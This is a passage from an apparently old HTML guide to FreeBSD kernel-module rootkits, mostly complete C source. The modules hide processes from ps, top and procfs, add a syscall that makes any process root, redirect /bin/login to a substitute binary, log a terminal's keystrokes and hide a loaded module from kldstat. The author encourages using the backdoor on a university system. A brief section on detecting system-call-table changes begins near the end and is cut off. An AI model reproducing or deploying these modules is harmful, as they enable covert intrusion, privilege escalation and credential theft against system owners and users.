+				if (p->p_ucred == NULL || 
+				    p->p_cred->p_ruid != (uid_t)name[0])
+					continue;
+				break;
+			}
+
+			error = sysctl_out_proc(p, req, doingzomb);
+			if (error)
+				return (error);
+		}
+	}
+	return (0);
+}
+</xmp>
+This function first checks whether we want information on all processes
+(KERN_ALL_PROCS) or on a single process (KERN_PROC_PID). This means our hack
+also must handle these two cases. The rest of the function is quite obvious.
+The allproc data is collected and copied in the user space buffer. The last
+sysctl_out_proc() function does the rest :
+<xmp>
+
+static int
+sysctl_out_proc(struct proc *p, struct sysctl_req *req, int doingzomb)
+{
+	struct eproc eproc;
+	int error;
+	pid_t pid = p->p_pid;
+
+	fill_eproc(p, &eproc);
+	error = SYSCTL_OUT(req,(caddr_t)p, sizeof(struct proc));
+	if (error)
+		return (error);
+	error = SYSCTL_OUT(req,(caddr_t)&eproc, sizeof(eproc));
+	if (error)
+		return (error);
+	if (!doingzomb && pid && (pfind(pid) != p))
+		return EAGAIN;
+	if (doingzomb && zpfind(pid) != p)
+		return EAGAIN;
+	return (0);
+}
+</xmp>
+This will set return code and move the memory. That's all.
+[A big SORRY to all kernel freaks, but explaining all this in more detail would
+produce 100 pages and more... ]. <br>
+My module also handles the kill signal just to demonstrate that it is also
+possible to intercept any signal calls to the PID of the process we want to
+hide. Recall that hiding does not mean that signals can't reach our process !
+Here is my module :<br>
+<xmp>
+/*This module shows how to hide any process from commands like 'ps' or 'top'.
+Recall that BSD uses the so called kvm library which uses special MIBs
+with sysctl commands, to get access to the kernel 'allproc' and 'zombroc' list
+from user space. Linux only relies on the procfs, so BSD is a bit harder to
+attack.*/
+
+/*FEATURES  : 
+1 - This module hides a certain process from proc lists produced by ps or top
+2 - This module hides a certain process from direct calls like 'ps PID'
+3 - This module intercepts the kill syscall in order to avoid killing our
+    process we want to hide (the kill is just an add-on, normally you are
+    secure enough with the points 1,2 and 4)
+4 - This module hides the proc entry from the procfs 
+*/
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <sys/queue.h>
+#include <dirent.h>
+#include <sys/sysctl.h>
+
+/*exact name of the process (+arguments) we want to hide*/
+#define HIDE_PROC "sniffer"
+
+/*this structure is used by BSD to describe a process for user space programs*/
+struct kinfo_proc {
+	struct	proc kp_proc;			/* proc structure */
+	struct	eproc {
+		struct	proc *e_paddr;		/* address of proc */
+		struct	session *e_sess;	/* session pointer */
+		struct	pcred e_pcred;		/* process credentials */
+		struct	ucred e_ucred;		/* current credentials */
+		struct  procsig e_procsig;	/* shared signal structure */
+                /*PADDING stuff*/
+		/*struct	vmspace e_vm;		 address space */
+		char pad1[180];
+                pid_t	e_ppid;			/* parent process id */
+		pid_t	e_pgid;			/* process group id */
+		short	e_jobc;			/* job control counter */
+		dev_t	e_tdev;			/* controlling tty dev */
+		pid_t	e_tpgid;		/* tty process group id */
+		struct	session *e_tsess;	/* tty session pointer */
+#define	WMESGLEN	7
+		char	e_wmesg[WMESGLEN+1];	/* wchan message */
+		segsz_t e_xsize;		/* text size */
+		short	e_xrssize;		/* text rss */
+		short	e_xccount;		/* text references */
+		short	e_xswrss;
+		long	e_flag;
+#define	EPROC_CTTY	0x01	/* controlling tty vnode active */
+#define	EPROC_SLEADER	0x02	/* session leader */
+		char	e_login[roundup(MAXLOGNAME, sizeof(long))];	/* setlogin() name */
+		long	e_spare[2];
+	} kp_eproc;
+};
+
+/*we need this counter to get the right sysctl call*/
+int global_counter;
+
+
+/*We need to define M_DIRP2 for allocating some memory in kernel space with
+  the help of the MALLOC macro*/
+MALLOC_DEFINE(M_DIRP2, "dirp2", "struct");
+
+
+/*This function returns the PID of the process we want to hide*/
+int 
+get_pid()
+{
+ struct proc *p;
+ 
+ p=allproc.lh_first;
+ for (; p!=0; p=p->p_list.le_next)
+ {
+  /*p->p_comm holds the process name*/
+  if (strcmp(p->p_comm, HIDE_PROC)==0)
+  {
+   return p->p_pid;
+  }
+ }
+ return -1;
+}
+
+/*nothing big, but for demonstration*/
+static int
+hacked_kill(struct proc *p, struct kill_args *uap)
+{
+ if (uap->pid==get_pid())
+  return ESRCH;
+ else
+  return kill(p, uap);
+}
+
+/*the BIG sysctl hack :)*/
+static int
+hacked_sysctl(struct proc *p, struct sysctl_args *uap)
+{
+ /*this will hold the MIB values*/
+ int mib[4]; 
+ size_t size, newsize;
+ /*this will hold the kinfo_proc structures in our kernel space*/
+ struct kinfo_proc kpr; 
+ /*just some stuff we need*/
+ int tmp, counter;
+
+ /*call sysctl, and get return value*/
+ tmp= __sysctl(p, uap);
+
+ /*grab the MIB from user space*/
+ copyin(uap->name, &mib, sizeof(mib)); 
+
+ /*Did someone issue something like 'ps PID' -> in order to get information
+ on a certain single process ? If so we need to handle this. Attention :
+ I skipped checkin' the first two mib[] fields, again I'm lazy :)*/
+ if (mib[2]==KERN_PROC_PID)
+ {
+  /*Does he want to get info on our process ?*/
+  if (mib[3]==get_pid())
+  {
+   /*If so we return a size value of 0 standing for no such process*/
+   size=0;
+   /*copy to user space*/
+   copyout(&size, uap->oldlenp, sizeof(size));
+   /*and return*/
+   return(0); 
+  }
+  else
+   /*otherwise display the reqeuested information*/
+   return 0;
+ }
+
+ /*the following code will handle calls like 'ps' and 'top' with ALL PROCS 
+ enable*/
+ /*ok, we need to check the MIB for 'hacking' the real sysctl
+   our first check is it CTL_KERN*/
+ if (mib[0]==CTL_KERN)
+ 
+ /*our second check is it KERN_PROC*/
+  if (mib[1]==KERN_PROC)
+
+  /*our third check : is it the second sysctl (not the one retrieving the
+   kinfo_proc structure list size ?*/
+   if (uap->old!=NULL)
+   {
+    /*only catch the first call*/
+    if (global_counter==0)
+    {
+     global_counter++;
+     /*now it's time to check for our PID we want to hide*/
+     /*NOTE : Here we check the memory region in user space for a kinfo_proc
+              structure with the needed PID*/
+     for (counter=0;(counter*sizeof(kpr)<=size); counter++)
+     {
+      /*copy from user to kernel space*/
+      copyin(uap->old+counter*sizeof(kpr), &kpr, sizeof(kpr));
+      /*do we have our PID ?*/
+      if (kpr.kp_proc.p_pid==get_pid()) 
+      {
+       /*YES, so patch the size of the memory region (decrement by one
+       kinfo_proc structure)*/
+       newsize=size-sizeof(kpr); 
+       /*'overlap' the memory, so we 'cut' our entry out*/
+       bcopy(uap->old+(counter+1)*sizeof(kpr), uap->old+counter*sizeof(kpr),
+             size-(counter+1)*sizeof(kpr));
+       
+      }
+     }
+     /*set the new size*/
+     copyout(&newsize, uap->oldlenp, sizeof(size));
+     /*and finally return*/
+     return 0;    
+    }  
+   }
+   /*we have the sysctl call, that requests the memory size of the kinfo_proc
+   list*/
+   /*if uap->old == NULL, then the user requests the process count*/
+   else
+   { 
+    /*we also need the size (count), so get it*/
+    copyin(uap->oldlenp, &size, sizeof(size));
+    /*in sys/kern/kern_proc.c BSD uses a size overestimated by 5 structures,
+    so we need to correct (decrease) that*/
+    size-=sizeof(kpr)*5;
+    newsize=size;
+    /*set global_counter to 0 for catching the only next sysctl*/
+    global_counter=0;
+   }
+ return tmp; 
+}
+
+
+/*Normal getdirentries hack for hiding the process from procfs*/
+static int
+hacked_getdirentries (struct proc *p, struct getdirentries_args *uap)
+{      
+ unsigned int tmp, n, t;
+ struct dirent *dirp2, *dirp3;
+  
+ /*The file we want to hide : The name must match exactly !*/
+ char hide[255];
+
+
+ /*copy the HIDE_PROC number into the hide string*/
+ sprintf(hide, "%d", get_pid()); 
+
+ /*just issue the syscall*/
+ getdirentries(p,uap);
+ 
+ /*this is the way BSD returns status values to the process issueing the
+   request.*/
+ tmp=p->p_retval[0];
+ 
+ if (tmp>0)
+ { 
+  /*allocate memory*/
+  MALLOC(dirp2, struct dirent*, tmp, M_DIRP2, M_NOWAIT);
+  /*copy the dirent structure for user space in our kernel space*/
+  copyin(uap->buf, dirp2, tmp);
+
+  /*dirp3 points to dirp2*/
+  dirp3=dirp2;
+ 
+  t=tmp;
+  
+  /*In this loop we check for every dirent structure in the user buffer*/
+  while (t > 0)
+  {
+   n = dirp3->d_reclen;
+   t-=n;
+   /*Do we have the entry for our file to hide (I don't check for procfs)*/
+   if (strcmp((char*)&(dirp3->d_name), (char*)&hide)==0) 
+   {
+    if (t!=0)  
+    {
+     /*ATTENTION : Do not use something like strcpy or so. bcopy is able to
+                   handle overlapping memroy locations, so this is our choice*/
+     bcopy((char*)dirp3+n,dirp3, t);
+    }
+    /*the dirent structure list is shorter now*/
+    tmp-=n;
+   }
+   /*The following piece of code is necessary, because we get one dirent entry
+     with d_reclen=0, if we would not implement this, we would get an infinite
+     while loop*/
+   if (dirp3->d_reclen==0) 
+   {
+    /*end is reached*/
+    t=0;
+   }
+   /*as long as there is something to copy, do it*/
+   if (t!=0)
+    /*get the next pointer from the dirent structure list*/ 
+    dirp3=(struct dirent*)((char*)dirp3+dirp3->d_reclen); 
+  }
+  /*we must decrement the getdirentries user call return value, if we changed
+    something*/
+   p->p_retval[0]=tmp; 
+
+  /*copy the whole (perhaps modified) memory back to the user buffer*/
+  copyout(dirp2, uap->buf, tmp);
+ 
+  /*free kernel memory*/
+  FREE(dirp2, M_DIRP2);
+ }
+ /*everything ok, so return 0*/
+ return	0;
+}
+
+/*the hacked getdirentries syscall*/
+static struct sysent hacked_getdirentries_sysent = {
+       4,	
+       hacked_getdirentries			/* sy_call */
+};
+
+
+/*the hacked kill sysentry*/
+static struct sysent hacked_kill_sysent = {
+       2,
+       hacked_kill
+};
+
+/*the hacked sysctl sysentry*/
+static struct sysent hacked_sysctl_sysent = {
+       6,	
+       hacked_sysctl			/* sy_call */
+};
+
+
+/*
+ * The function called at load/unload.
+ */
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+ 
+ switch (cmd) {
+  case MOD_LOAD :
+   /*replace the sysctl syscall with our own*/
+   sysent[202]=hacked_sysctl_sysent;
+   /*replace the kill syscall with our own*/
+   sysent[37]=hacked_kill_sysent;
+   /*replace the getdirentries syscall with our own*/
+   sysent[196]=hacked_getdirentries_sysent;
+  break;
+  case MOD_UNLOAD :
+   /*argument count has not changed, so we only need to restore the
+   function pointer*/
+   sysent[202].sy_call=(sy_call_t*)__sysctl;
+   sysent[37].sy_call=(sy_call_t*)kill;
+   sysent[196].sy_call=(sy_call_t*)getdirentries;
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+
+                                            
+/*module data*/         
+static moduledata_t syscall_mod = {
+ "ProcHide", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+  
+</xmp>
+Load this module and the process will be hidden. Already started processes can
+- of course - also be hidden.<br>
+You may say that this solution does not look very nice, I know, but again it's
+working. And please bear in mind that this module is again experimental.
+For kernel starters :<br>
+You may wonder why I didn't patch the allproc or zombproc list directly. Well
+those lists are also required for scheduling and other important system tasks.
+It would be far too complicated to code something like this, I really think
+that it's quite impossible.
+
+<p>
+<H3><A NAME="II.3.2."></A>3.2 Backdoor 'rootshell'</h3>
+<p>
+The following module was a nice idea I had when playing around with the proc
+structure. Load this module, and you can 'SU' without a password.
+The idea is very simple. The module implements a system call that gets one
+argument : a PID. This can be the PID of any process, but will normally be the
+PID of your user account shell (tcsh, sh, bash or whatever). This
+process will then become root (UID 0) by manipulating its cred structure.
+Here we go :
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/lock.h>
+
+/*arguments for our system call*/
+struct make_me_root_args {
+ /*which process should be set UID=0?*/
+ int p_pid;
+};
+ 
+/*A very simple system call handler making a certain process UID=0*/
+static int
+make_me_root (struct proc *p, struct make_me_root_args *uap)
+{
+ struct proc *pr=pfind(uap->p_pid);
+ 
+ /*this is all we need...*/
+ pr->p_cred->pc_ucred->cr_uid=0; 
+ return 0;
+}
+
+/*
+ * The `sysent' for the our syscall
+ */
+static struct sysent make_me_root_sysent = {
+	1,			/* sy_narg */
+	make_me_root		/* sy_call */
+};
+
+/*we choose slot number 210, because it's free on FreeBSD 3.1*/
+static int offset = 210;
+
+/*nothing to do here*/
+static int
+load (struct module *module, int cmd, void *arg)
+{
+ return 0;
+}
+
+/*start everything*/
+SYSCALL_MODULE(rootmod, &offset, &make_me_root_sysent, load, NULL);
+
+</xmp>
+The problem is that anyone can call this system call, but you can add some
+kind of simple authentication (like I did before) or just hide it with a
+filesysetem hack ;).
+
+Here's the user space :
+<xmp>
+/*in argv[1] this program waits for the PID to set UID=0*/
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+struct make_me_root_args {
+ int p_pid;
+};
+ 
+int
+main(int argc, char **argv)
+{
+ struct make_me_root_args mmra;
+
+ mmra.p_pid=atoi(argv[1]);
+ return syscall (210, mmra);
+}
+</xmp>
+In my opinion this is one of the easiest local backdoors. Interesting for
+thousands of students. Image your university uses a buggy FreeBSD system (every
+system is buggy, no piece of software is perfect). Do the scrippt-kiddie trick
+and become root, install the module (hiding should be added) and you are done.
+
+<p>
+<H3><A NAME="II.4."></A>4. File execution redirection</h3>
+<p>
+This method and its advantages were already described in my Linux article, so
+I will only give you the code plus some short words. Please note that this
+hack approach is a bit different from the Linux idea, so pay attention :
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <dirent.h>
+
+/* 
+ * Shareable process virtual address space.
+ * May eventually be merged with vm_map.
+ * Several fields are temporary (text, data stuff).
+ */
+struct vmspace {
+/*NOTE : I just used some padding stuff, to avoid too much include file
+         problems...
+*/
+/*	struct vm_map vm_map;	 VM address map */
+        char pad1[100];
+/*	struct pmap vm_pmap;	 private physical map */
+        char pad2[36];
+	int vm_refcnt;		/* number of references */
+	caddr_t vm_shm;		/* SYS5 shared memory private data XXX */
+/* we copy from vm_startcopy to the end of the structure on fork */
+#define vm_startcopy vm_rssize
+	segsz_t vm_rssize;	/* current resident set size in pages */
+	segsz_t vm_swrss;	/* resident set size before last swap */
+	segsz_t vm_tsize;	/* text size (pages) XXX */
+	segsz_t vm_dsize;	/* data size (pages) XXX */
+	segsz_t vm_ssize;	/* stack size (pages) */
+	caddr_t vm_taddr;	/* user virtual address of text XXX */
+	caddr_t vm_daddr;	/* user virtual address of data XXX */
+	caddr_t vm_maxsaddr;	/* user VA at max stack growth */
+	caddr_t vm_minsaddr;	/* user VA at max stack growth */
+};
+
+
+/*the hacked execve syscall*/
+static 
+int hacked_execve(struct proc *p, struct execve_args *uap)
+{
+ char name[255];
+ /*the file we want to redirect*/
+ char old_name[]="/bin/login";
+ /*the new file to execute, perhaps hiding is a good idea...*/
+ char new_name[]="/bin/newlogin";
+ size_t done;
+ struct obreak_args oa;
+ struct execve_args kap;
+ struct execve_aegs *nap;
+ char *user_new_name;      
+ 
+ /*get the program name the system (user) wants to execute via execve*/
+ copyinstr(uap->fname, name, 255, &done);
+
+ /*do we have the right file name?*/
+ if (strcmp((char*)&name, (char*)&old_name)==0)
+ {
+  /*IDEA : Now we allocate a bit of user space memory for a new execve_args
+           structure...*/
+  /*allocate one page*/
+  oa.nsize=curproc->p_vmspace->vm_daddr+ctob(curproc->p_vmspace->vm_dsize)+
+           4096;
+
+  /*set the adress*/
+  user_new_name=oa.nsize-256;
+  /*copy the new name to user space location*/
+  copyout(&new_name, user_new_name, strlen(new_name));
+  /*set the pointer kap.fname to the user space location*/
+  kap.fname=oa.nsize-256;
+  /*set the pointer kap.argv to the old uap entry in user space*/
+  kap.argv=uap->argv;
+  /*the same as above*/
+  kap.envv=uap->envv;
+  /*set the adress for the new execve_args structure in user space*/
+  nap=(struct execve_args*)oa.nsize-4000;
+  /*copy the kernel execve_args structure to the user space one*/
+  copyout(&kap, nap, sizeof(struct execve_args));
+  /*execute the new command with the same argv and envv values*/
+  return execve(curproc, nap);
+ }
+ /*if we don't have our file, just continue*/ 
+ return execve(p, uap);
+}
+
+/*the hacked execve syscall*/
+static struct sysent hacked_execve_sysent = {
+       3,	
+       hacked_execve			/* sy_call */
+};
+
+
+
+/*
+ * The function called at load/unload.
+ */
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+ switch (cmd) {
+  case MOD_LOAD :
+   /*replace the execve syscall with our own*/
+   sysent[SYS_execve]=hacked_execve_sysent;
+  break;
+  case MOD_UNLOAD :
+   /*argument count has not changed, so we only need to restore the
+   function pointer*/
+   sysent[SYS_execve].sy_call=(sy_call_t*)execve;
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+
+                                         
+        
+static moduledata_t syscall_mod = {
+ "ExeRedirect", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>
+
+I had to reuse an execve system call, so I was forced to allocate some user
+space memory for the new args. This is why the module is a bit long.
+
+<p>
+<H3><A NAME="II.5."></A>5. TTY hijacking</h3>
+<p>
+TTY hijacking has a long tradition, and though there may be lots of ways to do,
+kernel code is a quite nice solution. It was demonstrated on Linux boxes with
+LKM. Now it's time to show you how it works on BSD. <br>
+So take a look at my 10 minutes hack (don't expect good code) :
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+
+/*TTY we want to hijack*/
+#define MAJOR 12
+#define MINOR 2
+
+/*buffer size to use (for TTY data)*/
+#define BUFSIZE 8192
+
+/*global memory for saving all TTY inputs*/
+char *ttybuf;
+
+/*global counter to implement some (bad) kind of ring buffer*/
+int globalcounter=0;
+
+MALLOC_DEFINE(M_BUF, "buf", "buf");
+
+
+/*structure for system call to retrieve the TTYbuf data*/
+static struct get_tty_args {
+ char *buf;
+};
+
+/*I packed some structures into this module, to make things clearer.*/
+struct specinfo {
+	struct	vnode **si_hashchain;
+	struct	vnode *si_specnext;
+	struct	mount *si_mountpoint;
+	dev_t		si_rdev;
+	unsigned long	si_blksize; 
+};
+
+
+/*stuff needed for vnode structure*/
+typedef	int 	vop_t __P((void *));
+enum vtype	{ VNON, VREG, VDIR, VBLK, VCHR, VLNK, VSOCK, VFIFO, VBAD };
+TAILQ_HEAD(buflists, buf);
+
+
+/*non-complete vnode structure, we only need the device parts.*/
+struct vnode {
+	u_long	v_flag;				/* vnode flags (see below) */
+	int	v_usecount;			/* reference count of users */
+	int	v_writecount;			/* reference count of writers */
+	int	v_holdcnt;			/* page & buffer references */
+	daddr_t	v_lastr;			/* last read (read-ahead) */
+	u_long	v_id;				/* capability identifier */
+	struct	mount *v_mount;			/* ptr to vfs we are in */
+	vop_t	**v_op;				/* vnode operations vector */
+	TAILQ_ENTRY(vnode) v_freelist;		/* vnode freelist */
+	LIST_ENTRY(vnode) v_mntvnodes;		/* vnodes for mount point */
+	struct	buflists v_cleanblkhd;		/* clean blocklist head */
+	struct	buflists v_dirtyblkhd;		/* dirty blocklist head */
+	LIST_ENTRY(vnode) v_synclist;		/* vnodes with dirty buffers */
+	long	v_numoutput;			/* num of writes in progress */
+	enum	vtype v_type;			/* vnode type */
+	union {
+		struct mount	*vu_mountedhere;/* ptr to mounted vfs (VDIR) */
+		struct socket	*vu_socket;	/* unix ipc (VSOCK) */
+		struct specinfo	*vu_specinfo;	/* device (VCHR, VBLK) */
+		struct fifoinfo	*vu_fifoinfo;	/* fifo (VFIFO) */
+	} v_un;
+       /*....*/	
+};
+
+
+/*the shortest systemcall I ever saw, but (again) everything is working*/
+static 
+void get_tty(struct proc *p, struct get_tty_args *uap)
+{
+ copyout(ttybuf, uap->buf, BUFSIZE);
+}
+
+/*the hacked write syscall*/
+static 
+int hacked_write(struct proc *p, struct write_args *uap)
+{
+ /*we will examine the vnode of the file it is read from*/
+ struct vnode *vn;
+ /*we have to check the device for our TTY*/
+ dev_t device;
+
+ /*get the vnode*/
+ vn=(struct vnode*)curproc->p_fd->fd_ofiles[uap->fd]->f_data;
+ 
+ /*do we have a character device?*/
+ if (vn->v_type==VCHR)
+ {
+  /*if so get the device*/
+  device=vn->v_un.vu_specinfo->si_rdev;
+  /*check for MAJOR and MINOR codes*/
+  if ((major(device)==MAJOR) && (minor(device)==MINOR))
+  { 
+   /*arghh, this is no nice solution. Computer Science students should
+     correct this bad ring buffer implementation*/
+    if ((globalcounter+uap->nbyte)>BUFSIZE) globalcounter=0;
+   /*again no nice coding, just call me Mr. Lazy ;)*/ 
+    if (uap->nbyte<BUFSIZE)
+     copyin(uap->buf, ttybuf+globalcounter, uap->nbyte);   
+    globalcounter+=uap->nbyte;
+  }
+ }
+ return write(p, uap);
+}
+
+/*the hacked open syscall*/
+static struct sysent hacked_write_sysent = {
+       3,	
+       hacked_write			/* sy_call */
+};
+
+/*our own system call for bringing the kernel buffer to user space*/
+static struct sysent get_tty_sysent = {
+       1,	
+       get_tty			/* sy_call */
+};
+
+
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+ switch (cmd) {
+  case MOD_LOAD :
+   /*allocate memory. Bear in mind that M_NOWAIT is always a bit critical!*/
+   MALLOC(ttybuf, char*, BUFSIZE, M_BUF, M_NOWAIT);
+   /*replace the execve syscall with our own*/
+   sysent[SYS_write]=hacked_write_sysent;
+   /*again we use slot 210*/
+   sysent[210]=get_tty_sysent;
+  break;
+  case MOD_UNLOAD :
+   /*free buffer*/
+   FREE(ttybuf, M_BUF);
+   /*argument count has not changed, so we only need to restore the
+   function pointer*/
+   sysent[SYS_write].sy_call=(sy_call_t*)write;
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+                                                   
+        
+static moduledata_t syscall_mod = {
+ "TTYhijack", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>
+
+For any explainations read my Linux LKM text :). TTY hijacking is realized by
+intercepting every write system call and checking the vnode for the correct
+device codes (specified through major and minor).<br>
+The following little program represents the user space part, getting the 
+data.
+<xmp>
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+struct get_tty_args {
+ char *buf;
+};
+
+int
+main(int argc, char **argv)
+{
+ /*maybe you have to adjust the size value (see BUFSIZE in module)*/
+ char *buf=(char*)malloc(8192);
+ struct get_tty_args uap;
+ int counter;
+
+ uap.buf=buf;
+ syscall (210, uap);
+ /*I used this way of printing, maybe it would be a better job to handle some
+   command codes (old plain ASCII)*/
+ for (counter=0; counter<=8192; counter++)
+  printf("%c", buf[counter]);
+}
+</xmp>
+Ok, start the module with desired device codes. Wait some time, and start user
+space program...<br>
+The first big Linux TTY hijacking LKM used a device to manage the TTY buffer.
+Of course, this would also work on FreeBSD, but I hadn't got the time, so
+I just installed a system call.
+
+<p>
+<H3><A NAME="II.6."></A>6. Hiding the module</h3>
+<p>
+[Note : LKM hiding under FreeBSD 2.x systems was done before, KLD hiding for
+3.x systems is new, so read & learn.]<br>
+Now it's time to discuss hiding of our module. First of all we have to think
+about what to hide.<br>
+As I explained above there is a big difference between a link file and a
+module. Commands like 'kldstat' will give you a listing of loaded linkfiles,
+but there is no command to get a list of all loaded modules. 
+So guess where kldstat gets the listing from. It's just the linker file list 
+'files'. Now it's quite easy to hide this module and make it unremovable. Just
+delete the desired entry from the files list, and everything is fine. There are
+no problems with doing this (like there were with the proc lists). I have to
+admit that I only analyzed 40 % of the whole kernel code (I will continue) so
+I also implemented module hiding perhaps there is a place in the kernel we
+need it. So let's take a look at my implementation :
+
+<xmp>
+/*FEATURES :
+  - manipulate linker files list
+  - manipulate moodules list
+  - manipulate first linker file entry
+  - manipulate global linker file ID coutner
+  - manipulate global modules ID counter
+*/
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <sys/lock.h>
+
+
+typedef TAILQ_HEAD(, module) modulelist_t;
+
+
+extern struct lock lock;
+/*we have to patch the files list*/
+extern linker_file_list_t files;
+extern int next_file_id;
+/*we have to patch the modules list*/
+extern modulelist_t modules;
+extern  int nextid;
+
+
+struct module {
+ TAILQ_ENTRY(module) link;
+ TAILQ_ENTRY(module) flink;
+ struct linker_file *file;
+ int refs;
+ int id;
+ char *name;
+ modeventhand_t handler;
+ void *arg;
+ modspecific_t data;
+};
+
+char string[]="Hello Word";
+
+/*this is just to show that extern functions also work*/
+static
+void do_a_print()
+{
+ printf("IT WORKS : %s\n", string);
+}
+
+/*The syscall *TODO* function*/
+/*This function is not necessary, because we just want to hide a module. We
+only need it for checking, that our module is still working.*/
+static int
+hello (struct proc *p, void *arg)
+{
+ printf ("SYSCALL was ESTABLISHED and is still in memory \n");
+
+ do_a_print();
+ return 0;
+}
+
+/*
+ * The `sysent' for the new syscall
+ */
+static struct sysent hello_sysent = {
+	0,			/* sy_narg */
+	hello			/* sy_call */
+};
+
+/*
+ * The offset in sysent where the syscall is allocated.
+ */
+/*NO_SYSCALL stands for 'let the kernel choose the syscall number'*/
+static int offset = 210;
+
+/*
+ * The function called at load/unload.
+ */
+static int
+load (struct module *module, int cmd, void *arg)
+
+{
+ linker_file_t lf=0;
+
+ module_t mod=0;
+
+
+ lockmgr(&lock, LK_SHARED, 0, curproc);
+
+ /*NOTE : The first linker file is the current kernel image (/kernel for
+          example). If we load our module we will increase the reference cound
+          of the kernel link file, this might be a bit suspect, so we must
+          patch this.*/
+
+  (&files)->tqh_first->refs--;
+  for (lf=(&files)->tqh_first; lf; lf=(lf)->link.tqe_next) {
+
+  if (!strcmp(lf->filename, "hide.ko"))
+  {
+   /*first let's decrement the global link file counter*/
+   next_file_id--;
+   /*now let's remove the entry*/
+   if (((lf)->link.tqe_next)!=NULL)
+
+     (lf)->link.tqe_next->link.tqe_prev=(lf)->link.tqe_prev;
+    else
+     (&files)->tqh_last=(lf)->link.tqe_prev;
+    *(lf)->link.tqe_prev=(lf)->link.tqe_next;
+ 
+   break;    
+  } 
+ }
+ lockmgr(&lock, LK_RELEASE, 0, curproc);
+
+ for (mod=TAILQ_FIRST(&modules); mod; mod=TAILQ_NEXT(mod, link)) {
+  if(!strcmp(mod->name, "mysys"))
+  {
+   /*first let's patch the internal ID counter*/
+    nextid--;
+
+   TAILQ_REMOVE(&modules, mod, link);
+  }
+ }
+ return 0;
+}
+
+/*start everything*/
+/*This function only sets the field of X_module_data, where X stands for the
+kind of module; here SYSCALL_...*/
+SYSCALL_MODULE(mysys, &offset, &hello_sysent, load, NULL);
+</xmp> 
+Load this module via kldload and wonder ;). You won't see anything. Even
+loading another module will seem totally normal, because the ID field is only
+incremented by 1 due to our modifications. After adding this hiding feature
+any module is also unremovable and neary undetectable.
+
+<p>
+<H3><A NAME="II.7."></A>7. Last Words</h3>
+<p>
+As I said in my introduction this part only showed those hacks that
+needed a total re-implementation on BSD compared to the Linux ones. Every other
+hack I presented in my Linux text, should also work; but it's too trivial to
+explain this here.<br>
+Of course, it's also possible to write some kind of FreeBSD virus. Perhaps I
+will work on this, but it's quite easy.
+
+<p>
+<H3><A NAME="III."></A>III. Securing the kernel</h3>
+<p>
+This part will only show you how to avoid some problems (not all) you as
+administrator could have with 'hacker' modules playing havoc with your system
+call table. My Linux text showed many ways how to fight against hostile modules
+with the help of some protection LKMs. I won't repeat those ideas. You can use
+all those modules on FreeBSD too, you only have to change the code a bit. This
+is why this part is quite short; I only describe some new ideas.
+
+<p>
+<H3><A NAME="III.1."></A>1. How to detect sysent[] modifications</h3>
+<p>
+Those of you common with kernel hacking know that nearly every module that
+does something useful for a hacker must modify the kernel system call table.
+[Note : As I said in my introduction there are lots of ways to attack FreeBSD
+without patching the system call table, but ... wait for a further release of
+this text :)]  Those changes are needed to intercept and manipulate system
+calls. Of course there may also be some non-hacking modules that will change
+the global system call table (add a system call or so), but normally those
+driver modules (for example) don't change existing system calls. So we should
+implement some piece of code checking every system call entry on a system that
+is defined during startup for suspicious changes.
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <sys/lock.h>
+
+
+/*
+ * The function called at load/unload.
+ */
+static int
